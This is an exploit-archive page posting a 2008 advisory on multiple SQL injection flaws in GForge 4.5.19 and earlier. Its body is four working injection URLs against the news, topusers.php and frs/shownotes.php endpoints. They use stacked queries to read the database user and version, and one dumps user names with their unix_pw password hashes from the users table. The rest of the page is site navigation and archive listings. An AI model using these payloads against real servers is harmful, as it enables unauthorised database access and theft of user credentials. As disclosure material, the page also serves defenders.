gforge4519-sql.txt

gforge4519-sql.txt: Posted Oct 9, 2008; Authored by beford; Gforge versions 4.5.19 and below suffer from multiple remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | 5f39c45a4baa63a80d8e143281ef93aca4680340e668bcbf8374b59f64acb14a; Download | Favorite | View

gforge4519-sql.txt

Gforge <= 4.5.19 Multiple Sql Injections

Vendor Notified: 2008-10-06
Note: should work regardless magic_quotes_gpc setting.

http://gforgesite.xxx/new/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary
http://gforgesite.xxx/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
http://gforgesite.xxx/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5;

Replace 1337 with a valid group_id:

http://gforgesite.xxx/frs/shownotes.php?release_id=*/+--+454&pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/*

Top Authors In Last 30 Days

Red Hat 269 files
Ubuntu 98 files
indoushka 37 files
Gentoo 29 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 12 files
Jim Blankendaal 11 files
Apple 10 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,084)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,560)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,418)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,704)
UNIX (9,432)
UnixWare (187)
Windows (6,668)
Other

gforge4519-sql.txt

gforge4519-sql.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

gforge4519-sql.txt

Share This

gforge4519-sql.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems